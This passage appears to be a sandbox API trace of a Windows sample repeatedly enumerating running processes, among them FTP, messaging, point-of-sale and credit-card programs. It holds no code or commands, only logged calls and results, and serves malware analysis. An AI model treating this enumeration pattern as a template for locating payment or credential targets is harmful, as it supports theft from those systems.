th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0212.779] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0212.781] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0212.786] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0212.789] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0212.792] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0212.796] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0212.798] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0212.801] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0212.804] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0212.806] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0212.809] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0212.812] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0212.814] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0212.817] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0212.819] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0212.823] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0212.825] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0212.827] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0212.829] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0212.831] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0212.833] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0212.835] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0212.837] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0212.838] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0212.840] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0212.842] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0212.844] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0212.846] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0212.848] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0212.850] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0212.852] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0212.854] Process32Next (in: hSnapshot=0x211c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0212.856] CloseHandle (hObject=0x211c) returned 1 [0212.856] Sleep (dwMilliseconds=0x64) [0212.988] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2154 [0213.003] Process32First (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.005] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0213.007] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0213.009] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0213.011] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0213.013] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0213.015] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0213.017] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0213.019] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0213.021] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.023] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.098] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0213.101] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.104] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.106] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.111] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.113] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.116] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.119] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.121] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0213.124] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0213.127] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0213.130] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0213.132] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.214] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0213.217] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0213.219] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0213.221] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0213.224] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0213.227] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0213.231] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.233] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0213.236] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0213.238] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0213.241] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.244] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0213.247] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0213.256] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0213.259] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0213.263] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0213.265] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0213.268] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0213.271] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0213.275] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0213.277] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0213.280] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0213.283] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0213.285] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0213.288] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0213.290] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0213.299] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0213.302] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 